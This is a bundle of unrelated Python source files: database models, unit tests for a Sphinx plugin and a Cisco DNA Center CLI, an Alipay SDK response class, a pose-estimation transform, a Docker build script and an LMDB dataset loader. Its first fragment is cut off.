date=result.data
)
|
from sqlalchemy import *
from . import Base
class FITest(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
uuid = Column(String(255), index=True)
created_at = Column(DateTime)
updated_at = Column(DateTime)
def __repr__(self):
return '<FITest(id={}, uuid={}, created_at={})>'.format(self.id, self.uuid, self.created_at)
|
import dectate
from kaybee.plugins.genericpage.genericpage import Genericpage
from kaybee.plugins.genericpage.handlers import (
initialize_genericpages_container,
add_genericpage,
genericpage_into_html_context,
dump_settings,
)
class TestGenericpagesContainer:
def test_import(self):
assert 'initialize_genericpages_container' == \
initialize_genericpages_container.__name__
def test_result(self, genericpages_kb_app, sphinx_app, sphinx_env):
initialize_genericpages_container(genericpages_kb_app, sphinx_app,
sphinx_env,
[])
assert hasattr(sphinx_app.env, 'genericpages')
class TestGenericpagesAdd:
def test_import(self):
assert 'add_genericpage' == \
add_genericpage.__name__
def test_noadd_genericpage(self, genericpages_kb_app, genericpages_sphinx_app,
foo_doctree):
        # We have a resource for this docname, so don't add a genericpage
genericpages_sphinx_app.env.resources = dict(
foo=dict()
)
result = add_genericpage(genericpages_kb_app, genericpages_sphinx_app, foo_doctree)
assert None is result
def test_add_genericpage(self, genericpages_kb_app, genericpages_sphinx_app,
foo_doctree,
valid_gp):
genericpages_sphinx_app.env.resources = dict(
no_foo=dict()
)
genericpages_sphinx_app.genericpages = dict()
dectate.commit(genericpages_kb_app)
result = add_genericpage(genericpages_kb_app, genericpages_sphinx_app, foo_doctree)
assert valid_gp == result.__class__
assert 'foo' == result.docname
assert 'foo' in genericpages_sphinx_app.env.genericpages
class TestGenericpageIntoHtml:
def test_import(self):
assert 'genericpage_into_html_context' == \
genericpage_into_html_context.__name__
def test_has_resource(self, genericpages_kb_app, genericpages_sphinx_app,
sample_resources):
index = sample_resources['index']
genericpages_sphinx_app.env.resources = {index.docname: index}
pagename = index.docname
templatename = ''
context = dict()
doctree = dict()
result = genericpage_into_html_context(
genericpages_kb_app, genericpages_sphinx_app, pagename, templatename, context,
doctree
)
assert {} == context
def test_has_gp(self, genericpages_kb_app, genericpages_sphinx_app, sample_resources):
index = sample_resources['index']
genericpages_sphinx_app.env.resources = {index.docname: index}
about = Genericpage('r1/r2/about')
genericpages_sphinx_app.env.genericpages = {about.docname: about}
pagename = about.docname
templatename = ''
context = dict()
doctree = dict()
result = genericpage_into_html_context(
genericpages_kb_app, genericpages_sphinx_app, pagename, templatename, context,
doctree
)
assert 'genericpage' in context
assert 'page.html' == result['templatename']
def test_not_has_gp(self, genericpages_kb_app, genericpages_sphinx_app,
sample_resources):
index = sample_resources['index']
genericpages_sphinx_app.env.resources = {index.docname: index}
about = Genericpage('r1/r2/about')
genericpages_sphinx_app.env.genericpages = {}
pagename = about.docname
templatename = ''
context = dict()
doctree = dict()
result = genericpage_into_html_context(
genericpages_kb_app, genericpages_sphinx_app, pagename, templatename, context,
doctree
)
assert 'genericpage' not in context
assert None is result
class TestPluginGenerateDebugEvent:
def test_import(self):
assert 'dump_settings' == dump_settings.__name__
def test_debug(self, genericpages_kb_app, sphinx_env, valid_gps):
sphinx_env.resources = dict(
foo=dict()
)
sphinx_env.genericpages = dict(
foo=Genericpage('foo')
)
genericpages = dump_settings(genericpages_kb_app, sphinx_env)
assert 'genericpages' in genericpages
config = genericpages['genericpages']['config']
assert 10 in config
values = genericpages['genericpages']['values']
assert 1 == len(values)
assert 'foo' == values['foo']['docname']
|
# -*- coding: utf-8 -*-
"""DNACenterAPI Network Settings API fixtures and tests.
Copyright (c) 2019 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import click
import pytest
from json import loads
from tests.environment import DNA_CENTER_VERSION
pytestmark = pytest.mark.skipif(DNA_CENTER_VERSION != '1.3.3', reason='version does not match')
def is_valid_update_global_pool(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_update_global_pool(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'update-global-pool',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"ippool": [{"ipPoolName": "string", "gateway": "string", "dhcpServerIps": ["string"], "dnsServerIps": ["string"], "id": "string"}]}'"""])
assert not result.exception
assert is_valid_update_global_pool(result)
def is_valid_delete_device_credential(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_delete_device_credential(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'delete-device-credential',
"""--id='string'"""])
assert not result.exception
assert is_valid_delete_device_credential(result)
def is_valid_assign_credential_to_site(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_assign_credential_to_site(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'assign-credential-to-site',
"""--active_validation=True""",
"""--cliid='string'""",
"""--httpread='string'""",
"""--httpwrite='string'""",
"""--payload=None""",
"""--site_id='string'""",
"""--snmpv2readid='string'""",
"""--snmpv2writeid='string'""",
"""--snmpv3id='string'"""])
assert not result.exception
assert is_valid_assign_credential_to_site(result)
def is_valid_get_network(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_get_network(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'get-network',
"""--site_id='string'"""])
assert not result.exception
assert is_valid_get_network(result)
def is_valid_delete_sp_profile(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_delete_sp_profile(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'delete-sp-profile',
"""--sp_profile_name='string'"""])
assert not result.exception
assert is_valid_delete_sp_profile(result)
def is_valid_update_sp_profile(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_update_sp_profile(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'update-sp-profile',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"qos": [{"profileName": "string", "model": "string", "wanProvider": "string", "oldProfileName": "string"}]}'"""])
assert not result.exception
assert is_valid_update_sp_profile(result)
def is_valid_delete_global_ip_pool(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_delete_global_ip_pool(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'delete-global-ip-pool',
"""--id='string'"""])
assert not result.exception
assert is_valid_delete_global_ip_pool(result)
def is_valid_update_device_credentials(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_update_device_credentials(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'update-device-credentials',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"cliCredential": {"description": "string", "username": "string", "password": "string", "enablePassword": "string", "id": "string"}, "snmpV2cRead": {"description": "string", "readCommunity": "string", "id": "string"}, "snmpV2cWrite": {"description": "string", "writeCommunity": "string", "id": "string"}, "snmpV3": {"authPassword": "string", "authType": "string", "snmpMode": "string", "privacyPassword": "string", "privacyType": "string", "username": "string", "description": "string", "id": "string"}, "httpsRead": {"name": "string", "username": "string", "password": "string", "port": "string", "id": "string"}, "httpsWrite": {"name": "string", "username": "string", "password": "string", "port": "string", "id": "string"}}'"""])
assert not result.exception
assert is_valid_update_device_credentials(result)
def is_valid_update_network(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_update_network(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'update-network',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"dhcpServer": ["string"], "dnsServer": {"domainName": "can only contain alphanumeric characters or hyphen", "primaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255", "secondaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255"}, "syslogServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "snmpServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "netflowcollector": {"ipAddress": "string", "port": 0}, "ntpServer": ["string"], "timezone": "string", "messageOfTheday": {"bannerMessage": "string", "retainExistingBanner": true}, "network_aaa": {"servers": "Server type supported by ISE and AAA", "ipAddress": "Mandatory for ISE servers and for AAA consider this as additional Ip.", "network": "For AAA server consider it as primary IP and For ISE consider as Network", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}, "clientAndEndpoint_aaa": {"servers": "string", "ipAddress": "Mandatory for ISE servers.", "network": "string", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}}'""",
"""--site_id='string'"""])
assert not result.exception
assert is_valid_update_network(result)
def is_valid_get_service_provider_details(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_get_service_provider_details(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'get-service-provider-details',
"""--"""])
assert not result.exception
assert is_valid_get_service_provider_details(result)
def is_valid_get_device_credential_details(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_get_device_credential_details(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'get-device-credential-details',
"""--site_id='string'"""])
assert not result.exception
assert is_valid_get_device_credential_details(result)
def is_valid_create_sp_profile(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_create_sp_profile(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'create-sp-profile',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"qos": [{"profileName": "string", "model": "string", "wanProvider": "string"}]}'"""])
assert not result.exception
assert is_valid_create_sp_profile(result)
def is_valid_get_global_pool(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_get_global_pool(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'get-global-pool',
"""--limit='string'""",
"""--offset='string'"""])
assert not result.exception
assert is_valid_get_global_pool(result)
def is_valid_create_network(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_create_network(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'create-network',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"dhcpServer": ["string"], "dnsServer": {"domainName": "can only contain alphanumeric characters or hyphen", "primaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255", "secondaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255"}, "syslogServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "snmpServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "netflowcollector": {"ipAddress": "string", "port": 0}, "ntpServer": ["string"], "timezone": "string", "messageOfTheday": {"bannerMessage": "string", "retainExistingBanner": true}, "network_aaa": {"servers": "Server type supported by ISE and AAA", "ipAddress": "Mandatory for ISE servers and for AAA consider this as additional Ip.", "network": "For AAA server consider it as primary IP and For ISE consider as Network", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}, "clientAndEndpoint_aaa": {"servers": "string", "ipAddress": "Mandatory for ISE servers.", "network": "string", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}}'""",
"""--site_id='string'"""])
assert not result.exception
assert is_valid_create_network(result)
def is_valid_create_device_credentials(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_create_device_credentials(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'create-device-credentials',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"cliCredential": [{"description": "string", "username": "string", "password": "string", "enablePassword": "string"}], "snmpV2cRead": [{"description": "string", "readCommunity": "string"}], "snmpV2cWrite": [{"description": "string", "writeCommunity": "string"}], "snmpV3": [{"description": "string", "username": "string", "privacyType": "AES128", "privacyPassword": "string", "authType": "SHA", "authPassword": "string", "snmpMode": "AUTHPRIV"}], "httpsRead": [{"name": "string", "username": "string", "password": "string", "port": 0}], "httpsWrite": [{"name": "string", "username": "string", "password": "string", "port": 0}]}'"""])
assert not result.exception
assert is_valid_create_device_credentials(result)
def is_valid_create_global_pool(result):
data = result.output.strip()
return True if data else False
@pytest.mark.network_settings
def test_create_global_pool(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '1.3.3', *auth_options,
'network-settings', 'create-global-pool',
"""--active_validation=True""",
"""--payload=None""",
"""--settings='{"ippool": [{"ipPoolName": "string", "type": "Generic", "ipPoolCidr": "string", "gateway": "string", "dhcpServerIps": ["string"], "dnsServerIps": ["string"], "IpAddressSpace": "IPv6 or IPv4"}]}'"""])
assert not result.exception
assert is_valid_create_global_pool(result)
|
#!/usr/bin/env/python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pipeline Base Executor class."""
import abc
import logging
from six import with_metaclass
class BaseExecutor(with_metaclass(abc.ABCMeta, object)): # pylint: disable=R0903
"""Pipeline Base Executor abstract class."""
def __init__(self):
pass # pylint: disable=W0107
@abc.abstractmethod
def Do(self, input_dict: dict, output_dict: dict, exec_properties: dict): # pylint: disable=C0103
"""A Do function that does nothing."""
pass # pylint: disable=W0107
def _log_startup(
self, input_dict: dict, output_dict: dict, exec_properties
):
"""Log inputs, outputs, and executor properties in a standard
format."""
class_name = self.__class__.__name__
logging.debug("Starting %s execution.", class_name)
logging.debug("Inputs for %s are: %s .", class_name, input_dict)
logging.debug("Outputs for %s are: %s.", class_name, output_dict)
logging.debug(
"Execution Properties for %s are: %s",
class_name, exec_properties)
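# Hedged usage sketch (not part of the original module): "PrintExecutor" is a
# hypothetical subclass added only to illustrate how the abstract Do() hook and
# _log_startup() are meant to be combined.
class PrintExecutor(BaseExecutor):
    """Minimal concrete executor that only logs what it was given."""
    def Do(self, input_dict: dict, output_dict: dict, exec_properties: dict):  # pylint: disable=C0103
        self._log_startup(input_dict, output_dict, exec_properties)
        # A real executor would populate output_dict from input_dict here.


if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    PrintExecutor().Do({"in": "raw"}, {"out": None}, {"param": "value"})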
|
"""
Check utilities.progsnap
"""
import sys
import os
import unittest
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from pedal.utilities.progsnap import SqlProgSnap2
here = "" if os.path.basename(os.getcwd()) == "tests" else "tests/"
class TestProgsnap(unittest.TestCase):
def test_progsnap_sort(self):
progsnap = SqlProgSnap2(here+"datafiles/progsnap2_3.db")
link_filters = {
'Subject': {
'X-IsStaff': "False",
},
'Assignment': {
'X-Name': "Fun%"
},
}
link_selections = {
'Subject': {
'X-Email': 'student_email',
'X-Name.First': 'student_first',
'X-Name.Last': 'student_last',
},
'Assignment': {
'X-Name': 'assignment_name',
'X-URL': 'assignment_url',
'X-Code.OnRun': 'on_run'
}
}
fun_student_edits = progsnap.get_events(
event_filter={'EventType': 'File.Edit'},
link_filters=link_filters,
link_selections=link_selections
)
self.assertEqual(212, len(fun_student_edits))
self.assertIsInstance(fun_student_edits[0], dict)
self.assertEqual("592", fun_student_edits[0]['event_id'])
if __name__ == '__main__':
unittest.main(buffer=False)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.OpenBatch import OpenBatch
class KoubeiQualityTestCloudacptBatchQueryResponse(AlipayResponse):
def __init__(self):
super(KoubeiQualityTestCloudacptBatchQueryResponse, self).__init__()
self._activity_id = None
self._batch_list = None
self._batch_num = None
@property
def activity_id(self):
return self._activity_id
@activity_id.setter
def activity_id(self, value):
self._activity_id = value
@property
def batch_list(self):
return self._batch_list
@batch_list.setter
def batch_list(self, value):
if isinstance(value, list):
self._batch_list = list()
for i in value:
if isinstance(i, OpenBatch):
self._batch_list.append(i)
else:
self._batch_list.append(OpenBatch.from_alipay_dict(i))
@property
def batch_num(self):
return self._batch_num
@batch_num.setter
def batch_num(self, value):
self._batch_num = value
def parse_response_content(self, response_content):
response = super(KoubeiQualityTestCloudacptBatchQueryResponse, self).parse_response_content(response_content)
if 'activity_id' in response:
self.activity_id = response['activity_id']
if 'batch_list' in response:
self.batch_list = response['batch_list']
if 'batch_num' in response:
self.batch_num = response['batch_num']
|
import math
import random
import cv2
import numpy as np
import torch
from ..bbox import _box_to_center_scale, _center_scale_to_box
from ..transforms import (addDPG, affine_transform, flip_joints_3d,
get_affine_transform, im_to_torch)
class SimpleTransform(object):
"""Generation of cropped input person and pose heatmaps from SimplePose.
Parameters
----------
img: torch.Tensor
A tensor with shape: `(3, h, w)`.
label: dict
A dictionary with 4 keys:
`bbox`: [xmin, ymin, xmax, ymax]
`joints_3d`: numpy.ndarray with shape: (n_joints, 2),
including position and visible flag
`width`: image width
`height`: image height
dataset:
The dataset to be transformed, must include `joint_pairs` property for flipping.
scale_factor: int
Scale augmentation.
input_size: tuple
Input image size, as (height, width).
output_size: tuple
Heatmap size, as (height, width).
    rot: int
        Rotation augmentation.
    train: bool
        True for training transformation.
"""
def __init__(self, dataset, scale_factor, color_factor, occlusion, add_dpg,
input_size, output_size, rot, sigma,
train, loss_type='MSELoss', dict_output=False):
self._joint_pairs = dataset.joint_pairs
self._scale_factor = scale_factor
self._color_factor = color_factor
self._occlusion = occlusion
self._rot = rot
self._add_dpg = add_dpg
self._input_size = input_size
self._heatmap_size = output_size
self._sigma = sigma
self._train = train
self._loss_type = loss_type
self._aspect_ratio = float(input_size[1]) / input_size[0] # w / h
self._feat_stride = np.array(input_size) / np.array(output_size)
self.pixel_std = 1
self.dict_output = dict_output
if train:
self.num_joints_half_body = dataset.num_joints_half_body
self.prob_half_body = dataset.prob_half_body
self.upper_body_ids = dataset.upper_body_ids
self.lower_body_ids = dataset.lower_body_ids
def test_transform(self, src, bbox):
xmin, ymin, xmax, ymax = bbox
center, scale = _box_to_center_scale(
xmin, ymin, xmax - xmin, ymax - ymin, self._aspect_ratio)
scale = scale * 1.0
input_size = self._input_size
inp_h, inp_w = input_size
trans = get_affine_transform(center, scale, 0, [inp_w, inp_h])
img = cv2.warpAffine(src, trans, (int(inp_w), int(inp_h)), flags=cv2.INTER_LINEAR)
bbox = _center_scale_to_box(center, scale)
img = im_to_torch(img)
# mean
img[0].add_(-0.406)
img[1].add_(-0.457)
img[2].add_(-0.480)
# std
img[0].div_(0.225)
img[1].div_(0.224)
img[2].div_(0.229)
return img, bbox
def _target_generator(self, joints_3d, num_joints):
target_weight = np.ones((num_joints, 1), dtype=np.float32)
target_weight[:, 0] = joints_3d[:, 0, 1]
target = np.zeros((num_joints, self._heatmap_size[0], self._heatmap_size[1]),
dtype=np.float32)
tmp_size = self._sigma * 3
for i in range(num_joints):
mu_x = int(joints_3d[i, 0, 0] / self._feat_stride[0] + 0.5)
mu_y = int(joints_3d[i, 1, 0] / self._feat_stride[1] + 0.5)
# check if any part of the gaussian is in-bounds
ul = [int(mu_x - tmp_size), int(mu_y - tmp_size)]
br = [int(mu_x + tmp_size + 1), int(mu_y + tmp_size + 1)]
if (ul[0] >= self._heatmap_size[1] or ul[1] >= self._heatmap_size[0] or br[0] < 0 or br[1] < 0):
# return image as is
target_weight[i] = 0
continue
# generate gaussian
size = 2 * tmp_size + 1
x = np.arange(0, size, 1, np.float32)
y = x[:, np.newaxis]
x0 = y0 = size // 2
# the gaussian is not normalized, we want the center value to be equal to 1
g = np.exp(-((x - x0) ** 2 + (y - y0) ** 2) / (2 * (self._sigma ** 2)))
# usable gaussian range
g_x = max(0, -ul[0]), min(br[0], self._heatmap_size[1]) - ul[0]
g_y = max(0, -ul[1]), min(br[1], self._heatmap_size[0]) - ul[1]
# image range
img_x = max(0, ul[0]), min(br[0], self._heatmap_size[1])
img_y = max(0, ul[1]), min(br[1], self._heatmap_size[0])
v = target_weight[i]
if v > 0.5:
target[i, img_y[0]:img_y[1], img_x[0]:img_x[1]] = g[g_y[0]:g_y[1], g_x[0]:g_x[1]]
return target, np.expand_dims(target_weight, -1)
def _integral_target_generator(self, joints_3d, num_joints, patch_height, patch_width):
target_weight = np.ones((num_joints, 2), dtype=np.float32)
target_weight[:, 0] = joints_3d[:, 0, 1]
target_weight[:, 1] = joints_3d[:, 0, 1]
target = np.zeros((num_joints, 2), dtype=np.float32)
target[:, 0] = joints_3d[:, 0, 0] / patch_width - 0.5
target[:, 1] = joints_3d[:, 1, 0] / patch_height - 0.5
target = target.reshape((-1))
target_weight = target_weight.reshape((-1))
return target, target_weight
def __call__(self, src, label):
if label['bbox'] is not None:
bbox = list(label['bbox'])
else:
bbox = None
gt_joints = label['joints_3d']
imgwidth, imght = label['width'], label['height']
assert imgwidth == src.shape[1] and imght == src.shape[0]
self.num_joints = gt_joints.shape[0]
joints_vis = np.zeros((self.num_joints, 1), dtype=np.float32)
joints_vis[:, 0] = gt_joints[:, 0, 1]
input_size = self._input_size
if self._add_dpg and self._train:
bbox = addDPG(bbox, imgwidth, imght)
if bbox is not None:
xmin, ymin, xmax, ymax = bbox
center, scale = _box_to_center_scale(
xmin, ymin, xmax - xmin, ymax - ymin, self._aspect_ratio)
else:
center = np.array([imgwidth / 2, imght / 2], dtype=np.float32)
scale = np.array([imgwidth, imght], dtype=np.float32)
# half body transform
if self._train and (np.sum(joints_vis[:, 0]) > self.num_joints_half_body and np.random.rand() < self.prob_half_body):
c_half_body, s_half_body = self.half_body_transform(
gt_joints[:, :, 0], joints_vis
)
if c_half_body is not None and s_half_body is not None:
center, scale = c_half_body, s_half_body
# rescale
if self._train:
sf = self._scale_factor
scale = scale * np.clip(np.random.randn() * sf + 1, 1 - sf, 1 + sf)
else:
scale = scale * 1.0
# rotation
if self._train:
rf = self._rot
r = np.clip(np.random.randn() * rf, -rf * 2, rf * 2) if random.random() <= 0.6 else 0
else:
r = 0
if self._train and self._occlusion and bbox is not None:
while True:
area_min = 0.0
area_max = 0.7
synth_area = (random.random() * (area_max - area_min) + area_min) * (xmax - xmin) * (ymax - ymin)
ratio_min = 0.3
ratio_max = 1 / 0.3
synth_ratio = (random.random() * (ratio_max - ratio_min) + ratio_min)
synth_h = math.sqrt(synth_area * synth_ratio)
synth_w = math.sqrt(synth_area / synth_ratio)
synth_xmin = random.random() * ((xmax - xmin) - synth_w - 1) + xmin
synth_ymin = random.random() * ((ymax - ymin) - synth_h - 1) + ymin
if synth_xmin >= 0 and synth_ymin >= 0 and synth_xmin + synth_w < imgwidth and synth_ymin + synth_h < imght:
synth_xmin = int(synth_xmin)
synth_ymin = int(synth_ymin)
synth_w = int(synth_w)
synth_h = int(synth_h)
src[synth_ymin:synth_ymin + synth_h, synth_xmin:synth_xmin + synth_w, :] = np.random.rand(synth_h, synth_w, 3) * 255
break
joints = gt_joints
if random.random() > 0.5 and self._train:
# src, fliped = random_flip_image(src, px=0.5, py=0)
# if fliped[0]:
assert src.shape[2] == 3
src = src[:, ::-1, :]
joints = flip_joints_3d(joints, imgwidth, self._joint_pairs)
center[0] = imgwidth - center[0] - 1
inp_h, inp_w = input_size
trans = get_affine_transform(center, scale, r, [inp_w, inp_h])
img = cv2.warpAffine(src, trans, (int(inp_w), int(inp_h)), flags=cv2.INTER_LINEAR)
trans_inv = get_affine_transform(center, scale, r, [inp_w, inp_h], inv=True).astype(np.float32)
intrinsic_param = np.zeros((3, 3)).astype(np.float32)
joint_root = np.zeros((3)).astype(np.float32)
depth_factor = np.array([2000]).astype(np.float32)
# deal with joints visibility
for i in range(self.num_joints):
if joints[i, 0, 1] > 0.0:
joints[i, 0:2, 0] = affine_transform(joints[i, 0:2, 0], trans)
# generate training targets
if self._loss_type == 'MSELoss':
target, target_weight = self._target_generator(joints, self.num_joints)
elif 'LocationLoss' in self._loss_type or 'L1Loss' in self._loss_type:
target, target_weight = self._integral_target_generator(joints, self.num_joints, inp_h, inp_w)
bbox = _center_scale_to_box(center, scale)
assert img.shape[2] == 3
if self._train:
c_high = 1 + self._color_factor
c_low = 1 - self._color_factor
img[:, :, 0] = np.clip(img[:, :, 0] * random.uniform(c_low, c_high), 0, 255)
img[:, :, 1] = np.clip(img[:, :, 1] * random.uniform(c_low, c_high), 0, 255)
img[:, :, 2] = np.clip(img[:, :, 2] * random.uniform(c_low, c_high), 0, 255)
img = im_to_torch(img)
# mean
img[0].add_(-0.406)
img[1].add_(-0.457)
img[2].add_(-0.480)
# std
img[0].div_(0.225)
img[1].div_(0.224)
img[2].div_(0.229)
if self.dict_output:
output = {
'type': '2d_data',
'image': img,
'target': torch.from_numpy(target).float(),
'target_weight': torch.from_numpy(target_weight).float(),
'trans_inv': torch.from_numpy(trans_inv).float(),
'intrinsic_param': torch.from_numpy(intrinsic_param).float(),
'joint_root': torch.from_numpy(joint_root).float(),
'depth_factor': torch.from_numpy(depth_factor).float(),
'bbox': torch.Tensor(bbox)
}
return output
else:
return img, torch.from_numpy(target), torch.from_numpy(target_weight), torch.Tensor(bbox)
def half_body_transform(self, joints, joints_vis):
upper_joints = []
lower_joints = []
for joint_id in range(self.num_joints):
if joints_vis[joint_id][0] > 0:
if joint_id in self.upper_body_ids:
upper_joints.append(joints[joint_id])
else:
lower_joints.append(joints[joint_id])
if np.random.randn() < 0.5 and len(upper_joints) > 2:
selected_joints = upper_joints
else:
selected_joints = lower_joints \
if len(lower_joints) > 2 else upper_joints
if len(selected_joints) < 2:
return None, None
selected_joints = np.array(selected_joints, dtype=np.float32)
center = selected_joints.mean(axis=0)[:2]
left_top = np.amin(selected_joints, axis=0)
right_bottom = np.amax(selected_joints, axis=0)
w = right_bottom[0] - left_top[0]
h = right_bottom[1] - left_top[1]
if w > self._aspect_ratio * h:
h = w * 1.0 / self._aspect_ratio
elif w < self._aspect_ratio * h:
w = h * self._aspect_ratio
scale = np.array(
[
w * 1.0 / self.pixel_std,
h * 1.0 / self.pixel_std
],
dtype=np.float32
)
scale = scale * 1.5
return center, scale
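# Hedged usage sketch (illustrative, not part of the original module; the
# relative imports above mean this file is normally used as part of its
# package). A dataset passed to SimpleTransform must expose the attributes
# documented in the class docstring, e.g.:
#
#     transform = SimpleTransform(
#         dataset, scale_factor=0.25, color_factor=0.2, occlusion=False,
#         add_dpg=False, input_size=(256, 192), output_size=(64, 48),
#         rot=30, sigma=2, train=False)
#     inp, box = transform.test_transform(bgr_image, [xmin, ymin, xmax, ymax])
#     # inp is a normalized (3, 256, 192) torch tensor, box the clipped bbox.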
|
import docker
import json
import os
import sys
client = docker.from_env()
print('Building base image...')
client.images.build(path=os.getcwd(), tag='ann-benchmarks', rm=True, dockerfile='install/Dockerfile')
def build(library):
print('Building %s...' % library)
try:
client.images.build(path=os.getcwd(), tag='ann-benchmarks-%s' % library, rm=True, dockerfile='install/Dockerfile.%s' % library)
except docker.errors.BuildError as err:
print("Build error: {0}".format(err))
if os.getenv('LIBRARY'):
build(os.getenv('LIBRARY'))
else:
for fn in os.listdir('install'):
if fn.startswith('Dockerfile.'):
build(fn.split('.')[-1])
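# Usage sketch (illustrative; the script's actual file name may differ):
#     python install.py                  # build the base image plus every install/Dockerfile.<library>
#     LIBRARY=annoy python install.py    # build the base image plus only install/Dockerfile.annoy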
|
from typing import Union
from pathlib import Path
import lmdb
import subprocess
import string
import json
import os
from os import path
import pickle as pkl
from scipy.spatial.distance import squareform, pdist
import numpy as np
import torch
from torch.utils.data import Dataset
import pandas as pd
from sequence_models.utils import Tokenizer
from sequence_models.constants import trR_ALPHABET, DIST_BINS, PHI_BINS, THETA_BINS, OMEGA_BINS
from sequence_models.gnn import bins_to_vals
from sequence_models.pdb_utils import process_coords
class LMDBDataset(Dataset):
"""Creates a dataset from an lmdb file.
Args:
data_file (Union[str, Path]): Path to lmdb file.
in_memory (bool, optional): Whether to load the full dataset into memory.
Default: False.
"""
def __init__(self,
data_file: Union[str, Path],
in_memory: bool = False):
data_file = Path(data_file)
if not data_file.exists():
raise FileNotFoundError(data_file)
env = lmdb.open(str(data_file), max_readers=1, readonly=True,
lock=False, readahead=False, meminit=False)
with env.begin(write=False) as txn:
num_examples = pkl.loads(txn.get(b'num_examples'))
if in_memory:
cache = [None] * num_examples
self._cache = cache
self._env = env
self._in_memory = in_memory
self._num_examples = num_examples
def __len__(self) -> int:
return self._num_examples
def __getitem__(self, index: int):
if not 0 <= index < self._num_examples:
raise IndexError(index)
if self._in_memory and self._cache[index] is not None:
item = self._cache[index]
else:
with self._env.begin(write=False) as txn:
item = pkl.loads(txn.get(str(index).encode()))
if 'id' not in item:
item['id'] = str(index)
if self._in_memory:
self._cache[index] = item
return item
